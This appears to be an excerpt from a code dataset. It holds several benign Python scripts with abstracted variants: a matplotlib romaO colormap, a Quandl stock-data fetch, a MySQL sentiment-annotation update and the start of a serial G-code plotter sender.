[0.32489, 0.39861, 0.62495], \n [0.32755, 0.39152, 0.61809], \n [0.33035, 0.38448, 0.61111], \n [0.33327, 0.37755, 0.60402], \n 
[0.33627, 0.37068, 0.59684], \n [0.33939, 0.36392, 0.58955], \n [0.34257, 0.35728, 0.58219], \n [0.3458, 0.35073, 0.57476], \n [0.34912, 0.34428, 0.56727], \n [0.35247, 0.33797, 0.55971], \n [0.35587, 0.33179, 0.55212], \n [0.35927, 0.32574, 0.54448], \n [0.36271, 0.31986, 0.53684], \n [0.36617, 0.31411, 0.52917], \n [0.36961, 0.30852, 0.52148], \n [0.37306, 0.30306, 0.51382], \n [0.37652, 0.2978, 0.50615], \n [0.37994, 0.29269, 0.49854], \n [0.38336, 0.28775, 0.49094], \n [0.38674, 0.28301, 0.48337], \n [0.39011, 0.27842, 0.47586], \n [0.39346, 0.27401, 0.4684], \n [0.39677, 0.26978, 0.461], \n [0.40006, 0.26573, 0.45366], \n [0.40333, 0.26185, 0.4464], \n [0.40655, 0.25815, 0.43921], \n [0.40974, 0.25466, 0.43212], \n [0.4129, 0.25132, 0.42509], \n [0.41602, 0.24817, 0.41813], \n [0.41912, 0.24515, 0.41128], \n [0.42218, 0.24235, 0.40451], \n [0.42522, 0.23972, 0.39784], \n [0.42823, 0.23728, 0.39126], \n [0.43121, 0.23498, 0.38475], \n [0.43415, 0.23282, 0.37836], \n [0.43708, 0.23086, 0.37204], \n [0.43998, 0.22907, 0.36583], \n [0.44286, 0.22743, 0.3597], \n [0.44571, 0.22596, 0.35366], \n [0.44855, 0.2246, 0.34773]] \n \nromaO_map = LinearSegmentedColormap.from_list('romaO', cm_data) \n# For use of \"viscm view\" \ntest_cm = romaO_map \n \nif __name__ == \"__main__\": \n import matplotlib.pyplot as plt \n import numpy as np \n \n try: \n from viscm import viscm \n viscm(romaO_map) \n except ImportError: \n print(\"viscm not found, falling back on simple display\") \n plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', \n cmap=romaO_map) \n plt.show() \n", "from matplotlib.colors import LinearSegmentedColormap\ncm_data = [[0.45137, 0.22346, 0.34187], [0.45418, 0.22244, 0.3361], [\n 0.45696, 0.22158, 0.33043], [0.45975, 0.2209, 0.32483], [0.46251, \n 0.22035, 0.31935], [0.46527, 0.21994, 0.31394], [0.46803, 0.21968, \n 0.30862], [0.47078, 0.21958, 0.30337], [0.47352, 0.21962, 0.29822], [\n 0.47628, 0.21982, 0.29316], [0.47902, 0.22017, 0.28818], [0.48178, \n 0.22067, 0.2833], [0.48453, 0.2213, 0.2785], [0.48731, 0.22208, 0.27379\n ], [0.49008, 0.22304, 0.26917], [0.49286, 0.22411, 0.26461], [0.49567, \n 0.22536, 0.26016], [0.4985, 0.22677, 0.25579], [0.50134, 0.22833, \n 0.25153], [0.50419, 0.22999, 0.24733], [0.50707, 0.23188, 0.24322], [\n 0.50997, 0.23387, 0.23923], [0.5129, 0.23605, 0.23533], [0.51584, \n 0.23835, 0.23151], [0.51884, 0.24082, 0.22779], [0.52184, 0.24345, \n 0.22414], [0.52489, 0.24625, 0.22065], [0.52797, 0.2492, 0.2172], [\n 0.53108, 0.25231, 0.21387], [0.53423, 0.25556, 0.21064], [0.53742, \n 0.25899, 0.20753], [0.54063, 0.26255, 0.20452], [0.54389, 0.26628, \n 0.20158], [0.54718, 0.27017, 0.19879], [0.55051, 0.27419, 0.19613], [\n 0.55389, 0.27839, 0.19356], [0.55731, 0.28273, 0.19109], [0.56075, \n 0.2872, 0.18877], [0.56424, 0.29186, 0.18655], [0.56777, 0.29665, \n 0.18446], [0.57134, 0.30157, 0.18248], [0.57495, 0.30666, 0.18065], [\n 0.5786, 0.31186, 0.17898], [0.58228, 0.31724, 0.17743], [0.58602, \n 0.32275, 0.17597], [0.58977, 0.32838, 0.17473], [0.59358, 0.33415, \n 0.17358], [0.59742, 0.34005, 0.17261], [0.60129, 0.34606, 0.17179], [\n 0.60519, 0.35223, 0.17114], [0.60915, 0.35851, 0.17065], [0.61311, \n 0.36491, 0.17034], [0.61713, 0.37143, 0.1702], [0.62118, 0.37808, \n 0.17023], [0.62526, 0.38483, 0.17046], [0.62937, 0.39171, 0.17087], [\n 0.63352, 0.39869, 0.17148], [0.63769, 0.40579, 0.17229], [0.6419, \n 0.41299, 0.17332], [0.64613, 0.42029, 0.17458], [0.65041, 0.42771, \n 0.176], [0.6547, 0.43522, 0.17774], [0.65904, 0.44283, 0.17962], 
[\n 0.66341, 0.45054, 0.18175], [0.6678, 0.45834, 0.18416], [0.67222, \n 0.46625, 0.1868], [0.67667, 0.47425, 0.18968], [0.68114, 0.48233, \n 0.19283], [0.68566, 0.49051, 0.19624], [0.69019, 0.49878, 0.19987], [\n 0.69474, 0.50712, 0.20384], [0.69933, 0.51554, 0.20803], [0.70394, \n 0.52406, 0.21251], [0.70858, 0.53265, 0.21726], [0.71322, 0.5413, \n 0.22229], [0.7179, 0.55003, 0.22761], [0.72257, 0.55881, 0.23318], [\n 0.72727, 0.56767, 0.23907], [0.73197, 0.57658, 0.24521], [0.73666, \n 0.58553, 0.25168], [0.74136, 0.59451, 0.25837], [0.74605, 0.60354, \n 0.26537], [0.75073, 0.61259, 0.27263], [0.75538, 0.62166, 0.28017], [\n 0.76001, 0.63075, 0.28796], [0.7646, 0.63982, 0.29602], [0.76914, \n 0.64889, 0.30433], [0.77363, 0.65793, 0.31287], [0.77806, 0.66694, \n 0.32165], [0.78242, 0.6759, 0.33066], [0.78669, 0.68481, 0.33988], [\n 0.79087, 0.69365, 0.34929], [0.79494, 0.7024, 0.35888], [0.7989, \n 0.71106, 0.36867], [0.80273, 0.71961, 0.37859], [0.80642, 0.72803, \n 0.38866], [0.80996, 0.73631, 0.39885], [0.81334, 0.74446, 0.40916], [\n 0.81655, 0.75244, 0.41957], [0.81956, 0.76025, 0.43004], [0.82239, \n 0.76787, 0.44057], [0.82501, 0.7753, 0.45115], [0.82742, 0.78252, \n 0.46174], [0.8296, 0.78953, 0.47235], [0.83155, 0.79631, 0.48293], [\n 0.83326, 0.80287, 0.49349], [0.83472, 0.80919, 0.50402], [0.83592, \n 0.81526, 0.51449], [0.83686, 0.82109, 0.52487], [0.83753, 0.82666, \n 0.53517], [0.83793, 0.83198, 0.54537], [0.83805, 0.83703, 0.55546], [\n 0.83788, 0.84182, 0.56542], [0.83744, 0.84635, 0.57525], [0.8367, \n 0.85061, 0.58493], [0.83567, 0.85462, 0.59446], [0.83435, 0.85835, \n 0.60382], [0.83274, 0.86183, 0.61301], [0.83084, 0.86504, 0.62202], [\n 0.82864, 0.868, 0.63085], [0.82615, 0.87068, 0.63949], [0.82337, \n 0.87312, 0.64792], [0.8203, 0.87531, 0.65617], [0.81695, 0.87724, \n 0.6642], [0.81331, 0.87892, 0.67203], [0.80939, 0.88036, 0.67964], [\n 0.80518, 0.88156, 0.68705], [0.80071, 0.8825, 0.69424], [0.79595, \n 0.88322, 0.70121], [0.79094, 0.8837, 0.70797], [0.78566, 0.88395, \n 0.7145], [0.78012, 0.88396, 0.72082], [0.77433, 0.88375, 0.72692], [\n 0.7683, 0.88331, 0.73279], [0.76203, 0.88264, 0.73844], [0.75553, \n 0.88177, 0.74387], [0.74879, 0.88066, 0.74908], [0.74184, 0.87934, \n 0.75407], [0.73468, 0.87781, 0.75884], [0.72731, 0.87607, 0.76339], [\n 0.71976, 0.87411, 0.76772], [0.71201, 0.87195, 0.77184], [0.70408, \n 0.86958, 0.77573], [0.69599, 0.86701, 0.77941], [0.68774, 0.86425, \n 0.78288], [0.67934, 0.86127, 0.78614], [0.67081, 0.85811, 0.78919], [\n 0.66215, 0.85476, 0.79202], [0.65336, 0.8512, 0.79465], [0.64448, \n 0.84747, 0.79707], [0.6355, 0.84356, 0.7993], [0.62645, 0.83947, \n 0.80131], [0.61732, 0.83519, 0.80313], [0.60814, 0.83075, 0.80476], [\n 0.59891, 0.82614, 0.80619], [0.58965, 0.82137, 0.80743], [0.58037, \n 0.81644, 0.80848], [0.57108, 0.81135, 0.80935], [0.56181, 0.80612, \n 0.81004], [0.55255, 0.80074, 0.81055], [0.54332, 0.79522, 0.81088], [\n 0.53412, 0.78958, 0.81105], [0.525, 0.7838, 0.81105], [0.51593, 0.77791,\n 0.81088], [0.50695, 0.77189, 0.81055], [0.49808, 0.76577, 0.81007], [\n 0.48928, 0.75954, 0.80944], [0.48061, 0.75321, 0.80866], [0.47207, \n 0.7468, 0.80773], [0.46365, 0.74029, 0.80667], [0.45539, 0.7337, \n 0.80546], [0.44728, 0.72703, 0.80413], [0.43934, 0.7203, 0.80266], [\n 0.43158, 0.7135, 0.80107], [0.42398, 0.70664, 0.79936], [0.41658, \n 0.69971, 0.79752], [0.40938, 0.69275, 0.79557], [0.40237, 0.68572, \n 0.79351], [0.3956, 0.67865, 0.79133], [0.38903, 0.67155, 0.78905], [\n 0.38267, 0.66441, 0.78666], [0.37656, 
0.65724, 0.78416], [0.37066, \n 0.65003, 0.78155], [0.36502, 0.64279, 0.77884], [0.35961, 0.63552, \n 0.77604], [0.35446, 0.62824, 0.77312], [0.34955, 0.62094, 0.77011], [\n 0.3449, 0.6136, 0.767], [0.34051, 0.60625, 0.76378], [0.33637, 0.59889,\n 0.76047], [0.33253, 0.59151, 0.75704], [0.32893, 0.58412, 0.75351], [\n 0.32559, 0.57671, 0.74987], [0.32256, 0.56928, 0.74613], [0.31978, \n 0.56186, 0.74228], [0.31727, 0.55441, 0.7383], [0.31505, 0.54695, \n 0.73422], [0.31311, 0.53948, 0.73002], [0.31144, 0.53201, 0.72569], [\n 0.31007, 0.52453, 0.72124], [0.30897, 0.51704, 0.71667], [0.30811, \n 0.50955, 0.71197], [0.30755, 0.50205, 0.70713], [0.30726, 0.49456, \n 0.70216], [0.30723, 0.48707, 0.69706], [0.30746, 0.47958, 0.69182], [\n 0.30795, 0.4721, 0.68643], [0.3087, 0.46463, 0.6809], [0.30968, 0.45716,\n 0.67525], [0.31088, 0.44973, 0.66944], [0.31228, 0.44232, 0.6635], [\n 0.31393, 0.43493, 0.65741], [0.31578, 0.42758, 0.65118], [0.3178, \n 0.42025, 0.64482], [0.32001, 0.41299, 0.63833], [0.32238, 0.40577, \n 0.6317], [0.32489, 0.39861, 0.62495], [0.32755, 0.39152, 0.61809], [\n 0.33035, 0.38448, 0.61111], [0.33327, 0.37755, 0.60402], [0.33627, \n 0.37068, 0.59684], [0.33939, 0.36392, 0.58955], [0.34257, 0.35728, \n 0.58219], [0.3458, 0.35073, 0.57476], [0.34912, 0.34428, 0.56727], [\n 0.35247, 0.33797, 0.55971], [0.35587, 0.33179, 0.55212], [0.35927, \n 0.32574, 0.54448], [0.36271, 0.31986, 0.53684], [0.36617, 0.31411, \n 0.52917], [0.36961, 0.30852, 0.52148], [0.37306, 0.30306, 0.51382], [\n 0.37652, 0.2978, 0.50615], [0.37994, 0.29269, 0.49854], [0.38336, \n 0.28775, 0.49094], [0.38674, 0.28301, 0.48337], [0.39011, 0.27842, \n 0.47586], [0.39346, 0.27401, 0.4684], [0.39677, 0.26978, 0.461], [\n 0.40006, 0.26573, 0.45366], [0.40333, 0.26185, 0.4464], [0.40655, \n 0.25815, 0.43921], [0.40974, 0.25466, 0.43212], [0.4129, 0.25132, \n 0.42509], [0.41602, 0.24817, 0.41813], [0.41912, 0.24515, 0.41128], [\n 0.42218, 0.24235, 0.40451], [0.42522, 0.23972, 0.39784], [0.42823, \n 0.23728, 0.39126], [0.43121, 0.23498, 0.38475], [0.43415, 0.23282, \n 0.37836], [0.43708, 0.23086, 0.37204], [0.43998, 0.22907, 0.36583], [\n 0.44286, 0.22743, 0.3597], [0.44571, 0.22596, 0.35366], [0.44855, \n 0.2246, 0.34773]]\nromaO_map = LinearSegmentedColormap.from_list('romaO', cm_data)\ntest_cm = romaO_map\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n import numpy as np\n try:\n from viscm import viscm\n viscm(romaO_map)\n except ImportError:\n print('viscm not found, falling back on simple display')\n plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', cmap=\n romaO_map)\n plt.show()\n", "<import token>\ncm_data = [[0.45137, 0.22346, 0.34187], [0.45418, 0.22244, 0.3361], [\n 0.45696, 0.22158, 0.33043], [0.45975, 0.2209, 0.32483], [0.46251, \n 0.22035, 0.31935], [0.46527, 0.21994, 0.31394], [0.46803, 0.21968, \n 0.30862], [0.47078, 0.21958, 0.30337], [0.47352, 0.21962, 0.29822], [\n 0.47628, 0.21982, 0.29316], [0.47902, 0.22017, 0.28818], [0.48178, \n 0.22067, 0.2833], [0.48453, 0.2213, 0.2785], [0.48731, 0.22208, 0.27379\n ], [0.49008, 0.22304, 0.26917], [0.49286, 0.22411, 0.26461], [0.49567, \n 0.22536, 0.26016], [0.4985, 0.22677, 0.25579], [0.50134, 0.22833, \n 0.25153], [0.50419, 0.22999, 0.24733], [0.50707, 0.23188, 0.24322], [\n 0.50997, 0.23387, 0.23923], [0.5129, 0.23605, 0.23533], [0.51584, \n 0.23835, 0.23151], [0.51884, 0.24082, 0.22779], [0.52184, 0.24345, \n 0.22414], [0.52489, 0.24625, 0.22065], [0.52797, 0.2492, 0.2172], [\n 0.53108, 0.25231, 0.21387], [0.53423, 0.25556, 
0.21064], [0.53742, \n 0.25899, 0.20753], [0.54063, 0.26255, 0.20452], [0.54389, 0.26628, \n 0.20158], [0.54718, 0.27017, 0.19879], [0.55051, 0.27419, 0.19613], [\n 0.55389, 0.27839, 0.19356], [0.55731, 0.28273, 0.19109], [0.56075, \n 0.2872, 0.18877], [0.56424, 0.29186, 0.18655], [0.56777, 0.29665, \n 0.18446], [0.57134, 0.30157, 0.18248], [0.57495, 0.30666, 0.18065], [\n 0.5786, 0.31186, 0.17898], [0.58228, 0.31724, 0.17743], [0.58602, \n 0.32275, 0.17597], [0.58977, 0.32838, 0.17473], [0.59358, 0.33415, \n 0.17358], [0.59742, 0.34005, 0.17261], [0.60129, 0.34606, 0.17179], [\n 0.60519, 0.35223, 0.17114], [0.60915, 0.35851, 0.17065], [0.61311, \n 0.36491, 0.17034], [0.61713, 0.37143, 0.1702], [0.62118, 0.37808, \n 0.17023], [0.62526, 0.38483, 0.17046], [0.62937, 0.39171, 0.17087], [\n 0.63352, 0.39869, 0.17148], [0.63769, 0.40579, 0.17229], [0.6419, \n 0.41299, 0.17332], [0.64613, 0.42029, 0.17458], [0.65041, 0.42771, \n 0.176], [0.6547, 0.43522, 0.17774], [0.65904, 0.44283, 0.17962], [\n 0.66341, 0.45054, 0.18175], [0.6678, 0.45834, 0.18416], [0.67222, \n 0.46625, 0.1868], [0.67667, 0.47425, 0.18968], [0.68114, 0.48233, \n 0.19283], [0.68566, 0.49051, 0.19624], [0.69019, 0.49878, 0.19987], [\n 0.69474, 0.50712, 0.20384], [0.69933, 0.51554, 0.20803], [0.70394, \n 0.52406, 0.21251], [0.70858, 0.53265, 0.21726], [0.71322, 0.5413, \n 0.22229], [0.7179, 0.55003, 0.22761], [0.72257, 0.55881, 0.23318], [\n 0.72727, 0.56767, 0.23907], [0.73197, 0.57658, 0.24521], [0.73666, \n 0.58553, 0.25168], [0.74136, 0.59451, 0.25837], [0.74605, 0.60354, \n 0.26537], [0.75073, 0.61259, 0.27263], [0.75538, 0.62166, 0.28017], [\n 0.76001, 0.63075, 0.28796], [0.7646, 0.63982, 0.29602], [0.76914, \n 0.64889, 0.30433], [0.77363, 0.65793, 0.31287], [0.77806, 0.66694, \n 0.32165], [0.78242, 0.6759, 0.33066], [0.78669, 0.68481, 0.33988], [\n 0.79087, 0.69365, 0.34929], [0.79494, 0.7024, 0.35888], [0.7989, \n 0.71106, 0.36867], [0.80273, 0.71961, 0.37859], [0.80642, 0.72803, \n 0.38866], [0.80996, 0.73631, 0.39885], [0.81334, 0.74446, 0.40916], [\n 0.81655, 0.75244, 0.41957], [0.81956, 0.76025, 0.43004], [0.82239, \n 0.76787, 0.44057], [0.82501, 0.7753, 0.45115], [0.82742, 0.78252, \n 0.46174], [0.8296, 0.78953, 0.47235], [0.83155, 0.79631, 0.48293], [\n 0.83326, 0.80287, 0.49349], [0.83472, 0.80919, 0.50402], [0.83592, \n 0.81526, 0.51449], [0.83686, 0.82109, 0.52487], [0.83753, 0.82666, \n 0.53517], [0.83793, 0.83198, 0.54537], [0.83805, 0.83703, 0.55546], [\n 0.83788, 0.84182, 0.56542], [0.83744, 0.84635, 0.57525], [0.8367, \n 0.85061, 0.58493], [0.83567, 0.85462, 0.59446], [0.83435, 0.85835, \n 0.60382], [0.83274, 0.86183, 0.61301], [0.83084, 0.86504, 0.62202], [\n 0.82864, 0.868, 0.63085], [0.82615, 0.87068, 0.63949], [0.82337, \n 0.87312, 0.64792], [0.8203, 0.87531, 0.65617], [0.81695, 0.87724, \n 0.6642], [0.81331, 0.87892, 0.67203], [0.80939, 0.88036, 0.67964], [\n 0.80518, 0.88156, 0.68705], [0.80071, 0.8825, 0.69424], [0.79595, \n 0.88322, 0.70121], [0.79094, 0.8837, 0.70797], [0.78566, 0.88395, \n 0.7145], [0.78012, 0.88396, 0.72082], [0.77433, 0.88375, 0.72692], [\n 0.7683, 0.88331, 0.73279], [0.76203, 0.88264, 0.73844], [0.75553, \n 0.88177, 0.74387], [0.74879, 0.88066, 0.74908], [0.74184, 0.87934, \n 0.75407], [0.73468, 0.87781, 0.75884], [0.72731, 0.87607, 0.76339], [\n 0.71976, 0.87411, 0.76772], [0.71201, 0.87195, 0.77184], [0.70408, \n 0.86958, 0.77573], [0.69599, 0.86701, 0.77941], [0.68774, 0.86425, \n 0.78288], [0.67934, 0.86127, 0.78614], [0.67081, 0.85811, 0.78919], [\n 0.66215, 0.85476, 
0.79202], [0.65336, 0.8512, 0.79465], [0.64448, \n 0.84747, 0.79707], [0.6355, 0.84356, 0.7993], [0.62645, 0.83947, \n 0.80131], [0.61732, 0.83519, 0.80313], [0.60814, 0.83075, 0.80476], [\n 0.59891, 0.82614, 0.80619], [0.58965, 0.82137, 0.80743], [0.58037, \n 0.81644, 0.80848], [0.57108, 0.81135, 0.80935], [0.56181, 0.80612, \n 0.81004], [0.55255, 0.80074, 0.81055], [0.54332, 0.79522, 0.81088], [\n 0.53412, 0.78958, 0.81105], [0.525, 0.7838, 0.81105], [0.51593, 0.77791,\n 0.81088], [0.50695, 0.77189, 0.81055], [0.49808, 0.76577, 0.81007], [\n 0.48928, 0.75954, 0.80944], [0.48061, 0.75321, 0.80866], [0.47207, \n 0.7468, 0.80773], [0.46365, 0.74029, 0.80667], [0.45539, 0.7337, \n 0.80546], [0.44728, 0.72703, 0.80413], [0.43934, 0.7203, 0.80266], [\n 0.43158, 0.7135, 0.80107], [0.42398, 0.70664, 0.79936], [0.41658, \n 0.69971, 0.79752], [0.40938, 0.69275, 0.79557], [0.40237, 0.68572, \n 0.79351], [0.3956, 0.67865, 0.79133], [0.38903, 0.67155, 0.78905], [\n 0.38267, 0.66441, 0.78666], [0.37656, 0.65724, 0.78416], [0.37066, \n 0.65003, 0.78155], [0.36502, 0.64279, 0.77884], [0.35961, 0.63552, \n 0.77604], [0.35446, 0.62824, 0.77312], [0.34955, 0.62094, 0.77011], [\n 0.3449, 0.6136, 0.767], [0.34051, 0.60625, 0.76378], [0.33637, 0.59889,\n 0.76047], [0.33253, 0.59151, 0.75704], [0.32893, 0.58412, 0.75351], [\n 0.32559, 0.57671, 0.74987], [0.32256, 0.56928, 0.74613], [0.31978, \n 0.56186, 0.74228], [0.31727, 0.55441, 0.7383], [0.31505, 0.54695, \n 0.73422], [0.31311, 0.53948, 0.73002], [0.31144, 0.53201, 0.72569], [\n 0.31007, 0.52453, 0.72124], [0.30897, 0.51704, 0.71667], [0.30811, \n 0.50955, 0.71197], [0.30755, 0.50205, 0.70713], [0.30726, 0.49456, \n 0.70216], [0.30723, 0.48707, 0.69706], [0.30746, 0.47958, 0.69182], [\n 0.30795, 0.4721, 0.68643], [0.3087, 0.46463, 0.6809], [0.30968, 0.45716,\n 0.67525], [0.31088, 0.44973, 0.66944], [0.31228, 0.44232, 0.6635], [\n 0.31393, 0.43493, 0.65741], [0.31578, 0.42758, 0.65118], [0.3178, \n 0.42025, 0.64482], [0.32001, 0.41299, 0.63833], [0.32238, 0.40577, \n 0.6317], [0.32489, 0.39861, 0.62495], [0.32755, 0.39152, 0.61809], [\n 0.33035, 0.38448, 0.61111], [0.33327, 0.37755, 0.60402], [0.33627, \n 0.37068, 0.59684], [0.33939, 0.36392, 0.58955], [0.34257, 0.35728, \n 0.58219], [0.3458, 0.35073, 0.57476], [0.34912, 0.34428, 0.56727], [\n 0.35247, 0.33797, 0.55971], [0.35587, 0.33179, 0.55212], [0.35927, \n 0.32574, 0.54448], [0.36271, 0.31986, 0.53684], [0.36617, 0.31411, \n 0.52917], [0.36961, 0.30852, 0.52148], [0.37306, 0.30306, 0.51382], [\n 0.37652, 0.2978, 0.50615], [0.37994, 0.29269, 0.49854], [0.38336, \n 0.28775, 0.49094], [0.38674, 0.28301, 0.48337], [0.39011, 0.27842, \n 0.47586], [0.39346, 0.27401, 0.4684], [0.39677, 0.26978, 0.461], [\n 0.40006, 0.26573, 0.45366], [0.40333, 0.26185, 0.4464], [0.40655, \n 0.25815, 0.43921], [0.40974, 0.25466, 0.43212], [0.4129, 0.25132, \n 0.42509], [0.41602, 0.24817, 0.41813], [0.41912, 0.24515, 0.41128], [\n 0.42218, 0.24235, 0.40451], [0.42522, 0.23972, 0.39784], [0.42823, \n 0.23728, 0.39126], [0.43121, 0.23498, 0.38475], [0.43415, 0.23282, \n 0.37836], [0.43708, 0.23086, 0.37204], [0.43998, 0.22907, 0.36583], [\n 0.44286, 0.22743, 0.3597], [0.44571, 0.22596, 0.35366], [0.44855, \n 0.2246, 0.34773]]\nromaO_map = LinearSegmentedColormap.from_list('romaO', cm_data)\ntest_cm = romaO_map\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n import numpy as np\n try:\n from viscm import viscm\n viscm(romaO_map)\n except ImportError:\n print('viscm not found, falling back on simple display')\n 
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', cmap=\n romaO_map)\n plt.show()\n", "<import token>\n<assignment token>\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n import numpy as np\n try:\n from viscm import viscm\n viscm(romaO_map)\n except ImportError:\n print('viscm not found, falling back on simple display')\n plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', cmap=\n romaO_map)\n plt.show()\n", "<import token>\n<assignment token>\n<code token>\n" ]
false
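The record above bundles Fabio Crameri's cyclic romaO palette as a 256-entry RGB table and builds a Matplotlib colormap from it. A minimal sketch of how such a map can be registered and then used by name, assuming a reasonably recent Matplotlib (matplotlib.colormaps.register exists from 3.5 onward); the two-colour stand-in table and the synthetic phase field are illustration-only assumptions:

import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.colors import LinearSegmentedColormap

# Two-colour stand-in for the full 256-entry cm_data table in the record above.
cm_data = [[0.45137, 0.22346, 0.34187], [0.44855, 0.2246, 0.34773]]
romaO_map = LinearSegmentedColormap.from_list('romaO', cm_data)

# Registering the map lets later code refer to it by name alone.
matplotlib.colormaps.register(romaO_map)

# Cyclic maps such as romaO suit periodic data, e.g. a phase in (-pi, pi].
phase = np.angle(np.exp(2j * np.pi * np.random.rand(64, 64)))
plt.imshow(phase, cmap='romaO')
plt.colorbar(label='phase [rad]')
plt.show()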
46
3dd4b4d4241e588cf44230891f496bafb30c6153
import pandas as pd

# Ticker to fetch from the Quandl WIKI end-of-day price dataset.
n1 = 'ADS'
api_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1

# pandas reads the CSV endpoint directly over HTTP.
df = pd.read_csv(api_url)
df = df.head(100)  # keep only the first 100 rows returned
print(df.head())
[ "\n\nimport requests\nimport json\nimport pandas as pd\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n#print(list(data))\n", "import requests\nimport json\nimport pandas as pd\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n", "<import token>\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n", "<import token>\n<assignment token>\nprint(df.head())\n", "<import token>\n<assignment token>\n<code token>\n" ]
false
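A caveat on the record above: the Quandl WIKI equity-price dataset stopped being updated in 2018, and anonymous requests against the v3 API are tightly rate-limited, so the bare pd.read_csv call tends to fail in practice. A hedged variant that passes the documented api_key query parameter and catches the failure; the key value is a placeholder:

import pandas as pd

API_KEY = 'YOUR_QUANDL_API_KEY'  # placeholder, not a real key
n1 = 'ADS'
api_url = ('https://www.quandl.com/api/v3/datasets/WIKI/%s.csv?api_key=%s'
           % (n1, API_KEY))

try:
    df = pd.read_csv(api_url)
    print(df.head())
except Exception as exc:  # pandas surfaces urllib's HTTPError on a 4xx response
    print('Quandl request failed:', exc)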
47
a558b42106b036719fe38ee6efd1c5b933290f52
#!/usr/local/bin/python
# -*- coding: utf-8 -*-

import API_and_Database_function as func

# Connect to the MySQL sentiment database and get a handle on the
# annotation table through the project's helper module.
connection, Twitter_Sentiment_Analysis = func.Database_Acces(
    "mysql://root@localhost/sentiment?charset=utf8mb4", 'utf8',
    'Twitter_Sentiment_Analysis4')

# Force the session character set so non-ASCII tweet text round-trips.
stmt = "SET NAMES 'UTF8';"
connection.execute(stmt)

# Write the manually annotated labels from the CSV export back into the table.
func.update_annotations_db(Twitter_Sentiment_Analysis, connection,
                           "Export_csv5.csv")
[ "#!/usr/local/bin/python\n# -*- coding: utf-8 -*-\n\nfrom sqlalchemy import select, update\nfrom sqlalchemy import Table, Column, String, Integer, Float, Boolean, Date, BigInteger\nfrom sqlalchemy import create_engine, MetaData\nimport API_and_Database_function as func\nimport pandas as pd\nimport re\n\n\nconnection, Twitter_Sentiment_Analysis = func.Database_Acces(\"mysql://root@localhost/sentiment?charset=utf8mb4\", 'utf8' , 'Twitter_Sentiment_Analysis4' )\nstmt = \"SET NAMES 'UTF8';\"\nconnection.execute(stmt)\nfunc.update_annotations_db(Twitter_Sentiment_Analysis, connection, \"Export_csv5.csv\")", "from sqlalchemy import select, update\nfrom sqlalchemy import Table, Column, String, Integer, Float, Boolean, Date, BigInteger\nfrom sqlalchemy import create_engine, MetaData\nimport API_and_Database_function as func\nimport pandas as pd\nimport re\nconnection, Twitter_Sentiment_Analysis = func.Database_Acces(\n 'mysql://root@localhost/sentiment?charset=utf8mb4', 'utf8',\n 'Twitter_Sentiment_Analysis4')\nstmt = \"SET NAMES 'UTF8';\"\nconnection.execute(stmt)\nfunc.update_annotations_db(Twitter_Sentiment_Analysis, connection,\n 'Export_csv5.csv')\n", "<import token>\nconnection, Twitter_Sentiment_Analysis = func.Database_Acces(\n 'mysql://root@localhost/sentiment?charset=utf8mb4', 'utf8',\n 'Twitter_Sentiment_Analysis4')\nstmt = \"SET NAMES 'UTF8';\"\nconnection.execute(stmt)\nfunc.update_annotations_db(Twitter_Sentiment_Analysis, connection,\n 'Export_csv5.csv')\n", "<import token>\n<assignment token>\nconnection.execute(stmt)\nfunc.update_annotations_db(Twitter_Sentiment_Analysis, connection,\n 'Export_csv5.csv')\n", "<import token>\n<assignment token>\n<code token>\n" ]
false
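The two helpers above live in the project's own API_and_Database_function module, which is not part of this record. The sketch below is a plausible reconstruction inferred purely from the call sites: the signatures, the SQLAlchemy 1.x-style reflection, and the id/annotation column names are all assumptions, not the project's actual code:

from sqlalchemy import create_engine, MetaData, Table, update
import pandas as pd

def Database_Acces(db_url, encoding, table_name):
    # Open the database and reflect the named table (SQLAlchemy 1.x,
    # where create_engine still accepts an `encoding` argument).
    engine = create_engine(db_url, encoding=encoding)
    connection = engine.connect()
    table = Table(table_name, MetaData(), autoload=True, autoload_with=engine)
    return connection, table

def update_annotations_db(table, connection, csv_path):
    # Push labels from the exported CSV back into the table, one row at a
    # time; the 'id' and 'annotation' column names are assumptions.
    annotations = pd.read_csv(csv_path)
    for _, row in annotations.iterrows():
        connection.execute(
            update(table)
            .where(table.c.id == row['id'])
            .values(annotation=row['annotation']))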
48
10d35ba3c04d9cd09e152c575e74b0382ff60572
from pydispatch import dispatcher
import time
import serial
import threading
from queue import Queue

PORT = '/dev/ttys005'
# PORT = '/dev/tty.usbmodem1461'
SPEED = 4800.0


class GcodeSender(object):
    """Streams queued G-code to a plotter over a serial link, using the
    RepRap-style N<line>/<checksum> framing with resend handling."""

    # Servo pulse widths for the pen-lift servo (M340), in microseconds.
    PEN_LIFT_PULSE = 1500
    PEN_DROP_PULSE = 800

    def __init__(self, **kwargs):
        super(GcodeSender, self).__init__(**kwargs)
        self._stop = threading.Event()
        self.parsing_thread = None

        self.command_queue = Queue()
        self.line_number = 1
        self.last_command = None  # raw form of the last line, kept for resends
        self.plotter = None

        dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=dispatcher.Any)
        dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT', sender=dispatcher.Any)
        dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=dispatcher.Any)

    def on_move_to_point(self, x, y):
        print('X{0:.3f} Y{1:.3f}'.format(x, y))
        command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)
        self.command_queue.put_nowait(command)

    def on_pen_drop(self):
        # M400 drains the motion buffer, M340 moves the servo, G4 dwells
        # so the pen has settled before drawing continues.
        self.command_queue.put_nowait("M400")
